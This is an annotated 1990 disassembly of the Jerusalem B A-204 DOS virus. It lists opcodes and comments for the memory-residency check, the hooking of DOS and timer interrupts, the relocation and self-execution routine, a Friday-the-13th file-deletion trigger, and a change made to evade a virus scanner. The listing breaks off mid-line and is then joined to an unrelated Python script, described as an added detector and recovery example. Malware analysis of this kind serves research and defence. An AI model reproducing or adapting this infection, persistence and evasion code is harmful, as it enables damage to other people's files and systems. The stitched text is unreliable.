jerub204.asm
Virus : Jerusalem Version B Variant A-204
Disassembled by : Righard Zwienenberg
Steenwijklaan 302
2541 RT The Hague
The Netherlands
Data : +31-70-3898822, V22,V22b,HST,MNP,CM
Voice : +31-70-3675379
FidoNet address : 2:512/2.3
Used Software : ASMGEN, DEBUG and D86-Disassembler
Date : 20 June 1990
Note : All values are hex. If a value is followed by d (e.g. 30d) it means
30 decimal.
Note : This disassembly consists of two programs. The original program was
a dummy file (20h bytes long) containing 1Fh times 90h (NOP) followed by
one C3h (RET).
0100 E9 92 00 JMP 0195 ; JUMP -> 0195h
0103 db 2A,41,2D,32,30,34,2A ; *A-204* never used
010A dw 00 01 ; Startaddress original program
010C dw 01 56 ; Startaddress-offset original program
010E db 00 ; Trigger for destruction (delete file)
; Always zero, but if it is Friday the 13th and the year is
; not equal 1987 this byte is set to one
010F dw 00 00 ; Storing place for original AX (read-only word)
0111 dw 20 00 ; Length of Original Program (0020h)
0113 dw A5 FE ; Storing place for original BX of INT 08h vector
0115 dw 00 F0 ; Storing place for original ES of INT 08h vector
0117 dw 60 14 ; Storing place for original BX of INT 21h vector
0119 dw 2B 02 ; Storing place for original ES of INT 21h vector
011B dw 56 05 ; Storing place for original BX of INT 24h vector
011D dw DE 0C ; Storing place for original ES of INT 24h vector
011F dw 40 7E ; Storing place for timer for 30 minutes trigger
; By init. set to 7E90h
; The following words are never used by the virus. They are used
; by a routine starting at 0398h which is executed when INT 21h
; is called with AH=DEh. This never happens in the code.
0121 dw 00 00 ;
0123 dw 00 00 ;
0125 dw 00 00 ;
0127 dw 00 00 ;
0129 dw 00 00 ;
012B dw 00 00 ;
012D dw 00 E8 ;
012F dw 06 EC ;
0131 dw 91 16 ; Storing place for original ES
0133 dw 80 00 ; Storing place for BX. Never read again
0135 00 00 00 80 00 ; EXEC parameter block (ES:BX for AX=4B00h at 02A7h):
; environment segment 0000h, then far pointer to
; command line (offset 0080h, segment follows)
0139 dw 91 16 ; Storing place for original ES
013B 5C 00 ; Offset of far pointer to FCB1 (PSP:005Ch)
013D dw 91 16 ; Storing place for original ES
013F 6C 00 ; Offset of far pointer to FCB2 (PSP:006Ch)
0141 dw 91 16 ; Temp. storing place for original ES
0143 dw 00 20 ; Temp. storing place for AX
0145 dw 0D 1F ; Temp. storing place for ES+10h
0147 dw 5F 21 ; Storing place for AX
0149 dw A1 16 ; Temp. storing place for ES+10h
014B dw 00 F0 ; Temp. storing place for AX
014D db 02 ; Temp. storing place for AL
014E db 00 ; COM/EXE indicator
; 0 = EXE-File
; 1 = COM-File
0151 dw 30 01 ; Temp. storing place for DX
0153 dw 23 00 ; Temp. storing place for AX
0155 20 01
0157 dw 4A 00 ; Read Only!!! The code only reads this word to subtract it
; from AX
0159 D4 06 D4 06
015D dw 98 03 ; Temp. Storing place to store AX
015F dw 10 07 ; Probably startaddress of virus in mem
0161 dw 84 19 ; Never used!!! 1984h is stored here by the code
0163 dw C5 00 ; 00C5h is being read and put back later by the code
0165 dw 99 03 ; Temp. storing place for AX
0167 1C 00 00 00 90 90 90 90 C3
0170 dw 05 00 ; Storing place for file handle (BX)
0172 dw 20 00 ; Storing place for file attributes
; bit 0 = read only
; bit 1 = hidden file
; bit 2 = system file
; bit 3 = volume label
; bit 4 = subdirectory
; bit 5 = archive bit
; bit 8 = shareable (Novell Network)
0174 dw D5 14 ; Storing place for file date (DX)
0176 dw 99 83 ; Storing place for file time (CX)
0178 dw 00 02 ; 0200h=512d Used as multiplier/divider
017A dw 10 00 ; 0010h= 16d Used as multiplier/divider
017C dw 20 3E ; Temp. storing place for AX
017E dw 00 00 ; Temp. storing place for DX
0180 dw B9 42 ; Storing place for DX of ASCIZ-Filename
0182 dw 1A 9B ; Storing place for DS of ASCIZ-Filename
0184 db 43,4F,4D,4D,41,4E,44,2E,43,4F,4D ; COMMAND.COM
; May not become infected
018F dw 01 00 ; Storing place for variable-result of free-memory-scan
; 0000h : not enough memory available
; 0001h : enough memory available
0191 00 00 00 00
0195 FC CLD ; Clear Direct
0196 B4 E0 MOV AH,0E0 ; This is the check if the
0198 CD 21 INT 021 ; virus is already active
; in memory. INT 21h with
; AH=E0h will return AX=0300h
; if the virus is active.
019A 80 FC E0 CMP AH,0E0 ; AH>=E0h?
019D 73 16 JAE 01B5 ; Yes: -> 01B5h
019F 80 FC 03 CMP AH,3 ; AH<03h?
01A2 72 11 JB 01B5 ; Yes: -> 01B5h
; INT 21h with AH=
; DDh,DEh,E0h
; are self-defined.
; SetUp for
; Executing original program
; We come here if an infected
; program is executed and the
; virus is already active in
; memory.
01A4 B4 DD MOV AH,0DD ;
01A6 BF 00 01 MOV DI,0100 ; Destination Index = 0100h
01A9 BE 10 07 MOV SI,0710 ; Source Index = 0710h
01AC 03 F7 ADD SI,DI ; Source Index:= 0810h
; At this place the original
; Program is located
01AE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=20h (length original
; Program)
01B3 CD 21 INT 021 ;
; Here we come when the virus
; is not yet in memory
01B5 8C C8 MOV AX,CS ; AX=Code Segment
01B7 05 10 00 ADD AX,010 ; AX:=AX+10h
01BA 8E D0 MOV SS,AX ; Stack Segment:=AX
01BC BC 00 07 MOV SP,0700 ; StackPointer = 0700h
01BF 50 PUSH AX ; Store AX
01C0 B8 C5 00 MOV AX,0C5 ; AX = C5h
01C3 50 PUSH AX ; Store AX
01C4 CB RETF ; -> C5h
01C5 FC CLD ; Clear Direct
01C6 06 PUSH ES ; Store ES
01C7 2E 8C 06 31 00 CS MOV W[031],ES ; Store ES
01CC 2E 8C 06 39 00 CS MOV W[039],ES ; in storage places
01D1 2E 8C 06 3D 00 CS MOV W[03D],ES ;
01D6 2E 8C 06 41 00 CS MOV W[041],ES ;
01DB 8C C0 MOV AX,ES ; AX=ES
01DD 05 10 00 ADD AX,010 ; AX=AX+10h
01E0 2E 01 06 49 00 CS ADD W[049],AX ; Add AX (ES+10h) to 0149h
01E5 2E 01 06 45 00 CS ADD W[045],AX ; and 0145h
01EA B4 E0 MOV AH,0E0 ; AH=E0h (Self defined)
01EC CD 21 INT 021 ; CALL INT 21h
01EE 80 FC E0 CMP AH,0E0 ; AH>=E0h?
01F1 73 13 JAE 0206 ; Yes: -> 0206
01F3 80 FC 03 CMP AH,3 ; AH=03h? Must be if the
; virus code is in memory
; and interrupt 21h is called
; with AH=E0h.
01F6 07 POP ES ; Restore original ES
01F7 2E 8E 16 45 00 CS MOV SS,W[045] ; SS=ES+10h
01FC 2E 8B 26 43 00 CS MOV SP,W[043] ;
0201 2E FF 2E 47 00 CS JMP D[047] ;
0206 33 C0 XOR AX,AX ; AX=0000h
0208 8E C0 MOV ES,AX ; ES=0000h
020A 26 A1 FC 03 ES MOV AX,W[03FC] ; Save word at 0000:03FCh
; (INT FFh vector entry)
; Here the A-204 variant
; differs for the first
; time from the original
; Jerusalem Version B virus.
020E 26 A0 FE 03 ES MOV AL,B[03FE] ; These two lines have been
0212 2E A3 4B 00 CS MOV W[04B],AX ; changed in order
; to avoid being
; detected by ViruScan from
; John McAfee.
0216 2E A2 4D 00 CS MOV B[04D],AL
021A 26 C7 06 FC 03 F3 A5 ES MOV W[03FC],0A5F3 ; Plant F3 A5 (REP MOVSW)
0221 26 C6 06 FE 03 CB ES MOV B[03FE],0CB ; and CB (RETF) at 0000:03FCh
0227 58 POP AX ; AX = original ES (PSP segment)
0228 05 10 00 ADD AX,010 ; AX = PSP+10h
022B 8E C0 MOV ES,AX ; ES = PSP+10h (target of the copy)
022D 0E PUSH CS ; Store CS
022E 1F POP DS ; DS=CS
022F B9 10 07 MOV CX,0710 ; CX=0710h
0232 D1 E9 SHR CX,1 ; CX >> 1 (CX:=0388h words)
0234 33 F6 XOR SI,SI ; SI=0000h
0236 8B FE MOV DI,SI ; DI=0000h
0238 06 PUSH ES ; Store ES (return segment)
0239 B8 42 01 MOV AX,0142 ; AX=0142h
023C 50 PUSH AX ; Store AX
023D EA FC 03 00 00 JMP 0:03FC ; Run the planted REP MOVSW/RETF:
; copies 0710h bytes CS:0 -> ES:0
; then RETF -> ES:0142h
0242 8C C8 MOV AX,CS ; AX=CS
0244 8E D0 MOV SS,AX ; SS=CS
0246 BC 00 07 MOV SP,0700 ; SP=0700h
0249 33 C0 XOR AX,AX ; AX=0000h
024B 8E D8 MOV DS,AX ; DS=0000h
024D 2E A1 4B 00 CS MOV AX,W[04B] ; Restore AX
0251 A3 FC 03 MOV W[03FC],AX ; Store AX
0254 2E A0 4D 00 CS MOV AL,B[04D] ; Restore AL
0258 A2 FE 03 MOV B[03FE],AL ; Store AL
025B 8B DC MOV BX,SP ; BX=SP
025D B1 04 MOV CL,4 ; CL=04h
025F D3 EB SHR BX,CL ; BX >> 4
0261 83 C3 10 ADD BX,010 ; BX=BX+10h
0264 2E 89 1E 33 00 CS MOV W[033],BX ; Store BX. Why I don't know,
; the storing place is never
; read again
0269 B4 4A MOV AH,04A ;
026B 2E 8E 06 31 00 CS MOV ES,W[031] ; Restore ES
0270 CD 21 INT 021 ; Adjust Memory Block Size
; (SETBLOCK)
0272 B8 21 35 MOV AX,03521 ; Get original INT 21h
0275 CD 21 INT 021 ; vector
0277 2E 89 1E 17 00 CS MOV W[017],BX ; Store BX and ES of INT 21h
027C 2E 8C 06 19 00 CS MOV W[019],ES ; vector
0281 0E PUSH CS ; Store CS
0282 1F POP DS ; DS=CS
0283 BA 5B 02 MOV DX,025B ; DX=025Bh
0286 B8 21 25 MOV AX,02521 ; Set new INT 21h
0289 CD 21 INT 021 ; vector on DS:025Bh
028B 8E 06 31 00 MOV ES,W[031] ; Restore original ES
028F 26 8E 06 2C 00 ES MOV ES,W[02C] ; ES = environment segment
; (PSP offset 2Ch)
0294 33 FF XOR DI,DI ; DI=0000h
0296 B9 FF 7F MOV CX,07FFF ; CX=7FFFh (max. scan length)
0299 32 C0 XOR AL,AL ; AL=00h
029B F2 AE REPNE SCASB ; Scan for a zero byte
029D 26 38 05 ES CMP B[DI],AL ; Is the next byte also zero?
02A0 E0 F9 LOOPNE 029B ; No and CX<>0: -> 029Bh
; The double zero ends the
; environment block
02A2 8B D7 MOV DX,DI ; DX=DI
02A4 83 C2 03 ADD DX,3 ; Skip 2nd zero and the word count:
; DS:DX -> full path of this program
02A7 B8 00 4B MOV AX,04B00 ; AX=4B00h (EXEC: load and execute)
02AA 06 PUSH ES ; Store ES
02AB 1F POP DS ; Restore DS (DS:=ES)
02AC 0E PUSH CS ; Store CS
02AD 07 POP ES ; Restore ES (ES:=CS)
02AE BB 35 00 MOV BX,035 ; BX=35h: ES:BX -> EXEC parameter
; block at 0135h
02B1 1E PUSH DS ; Store Registers
02B2 06 PUSH ES
02B3 50 PUSH AX
02B4 53 PUSH BX
02B5 51 PUSH CX
02B6 52 PUSH DX
02B7 B4 2A MOV AH,02A ; Get Current Date
02B9 CD 21 INT 021 ; DL=day
; DH=month
; CX=year
; AL=Day of the week
02BB 2E C6 06 0E 00 00 CS MOV B[0E],0 ; Set Trigger for deleting
; infected files to 00h
02C1 81 F9 C3 07 CMP CX,07C3 ; Is year 1987 ?
02C5 74 30 JE 02F7 ; Yes: -> 02F7h
02C7 3C 05 CMP AL,5 ; Is it Friday ?
02C9 75 0D JNE 02D8 ; No: -> 02D8h
02CB 80 FA 0D CMP DL,0D ; Is it 13th ?
02CE 75 08 JNE 02D8 ; No: -> 02D8h
; Yes: it is Friday
; the 13th and the
; year is not equal 1987
02D0 2E FE 06 0E 00 CS INC B[0E] ; Set Trigger for deleting
; infected files to 01h
02D5 EB 20 JMP 02F7 ; JUMP -> 02F7h
02D7 90 NOP
02D8 B8 08 35 MOV AX,03508 ; Get original INT 8h
02DB CD 21 INT 021 ; vector
02DD 2E 89 1E 13 00 CS MOV W[013],BX ; Store original BX
02E2 2E 8C 06 15 00 CS MOV W[015],ES ; and ES of INT 08h vector
02E7 0E PUSH CS
02E8 1F POP DS
02E9 C7 06 1F 00 90 7E MOV W[01F],07E90 ; Store 30d minutes into
; timer interrupt. This
; value is decreased by
; one 18.2 times per second
02EF B8 08 25 MOV AX,02508 ; Set new INT 8h vector
02F2 BA 1E 02 MOV DX,021E ; to DS:021Eh
02F5 CD 21 INT 021 ;
02F7 5A POP DX ; Restore Registers
02F8 59 POP CX
02F9 5B POP BX
02FA 58 POP AX
02FB 07 POP ES
02FC 1F POP DS
02FD 9C PUSHF ; Store Flags
02FE 2E FF 1E 17 00 CS CALL D[017] ; Call original INT 21h
; address (EXEC of this
; program's own file)
0303 1E PUSH DS ; Restore DS
0304 07 POP ES ; Store ES
0305 B4 49 MOV AH,049 ; Free Memory
0307 CD 21 INT 021 ;
0309 B4 4D MOV AH,04D ; Get ExitCode of
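As a defender-side illustration of the file layout this listing documents (the JMP 0195h and *A-204* marker at 0100h-0109h, the original-program length word at 0111h, the host program copied back from 0810h, and the Friday-the-13th check at 02C1h-02D0h), here is an added Python example that is not part of the original disassembly: it recognizes a COM file carrying this prologue, carves the host program back out, and evaluates the date trigger. The 0710h-byte virus length and the COM-only layout are assumptions taken from the listing; the sample file is constructed inline and contains no virus code.

```python
import struct
from datetime import date

# Layout assumed from the listing (COM host; file offset = address - 0100h)
VIRUS_LEN = 0x710               # host program starts at 0810h in memory
ENTRY_JMP = b"\xE9\x92\x00"     # 0100h: JMP 0195h
MARKER = b"*A-204*"             # 0103h: variant marker, never read by the code
MARKER_OFF = 0x03
ORIG_LEN_OFF = 0x11             # 0111h: dw length of the original program


def is_infected_com(data: bytes) -> bool:
    """True if the file carries the fixed A-204 prologue described above."""
    return (len(data) > VIRUS_LEN
            and data.startswith(ENTRY_JMP)
            and data[MARKER_OFF:MARKER_OFF + len(MARKER)] == MARKER)


def original_length(data: bytes) -> int:
    """Little-endian word at 0111h (0020h for the dummy host on this page)."""
    return struct.unpack_from("<H", data, ORIG_LEN_OFF)[0]


def recover_original(data: bytes) -> bytes:
    """Carve the host program back out, mirroring MOV SI,0710h / MOV CX,W[0111h]."""
    if not is_infected_com(data):
        raise ValueError("not an A-204-infected COM file")
    n = original_length(data)
    if len(data) < VIRUS_LEN + n:
        raise ValueError("file shorter than virus body plus recorded host length")
    return data[VIRUS_LEN:VIRUS_LEN + n]


def deletion_trigger(year: int, month: int, day: int) -> bool:
    """Byte 010Eh is set only when year != 1987, it is Friday and the 13th
    (INT 21h/2Ah returns CX=year, DH=month, DL=day, AL=5 for Friday)."""
    return year != 1987 and day == 13 and date(year, month, day).weekday() == 4


def build_sample() -> bytes:
    """Constructed test file: header words from the listing, zero-filled body,
    and the 1Fh x NOP + RET dummy host. Not a real infected file."""
    header = ENTRY_JMP + MARKER + struct.pack(
        "<HHBHH", 0x0100, 0x0156, 0x00, 0x0000, 0x0020)
    body = header + b"\x00" * (VIRUS_LEN - len(header))
    host = b"\x90" * 0x1F + b"\xC3"
    return body + host
```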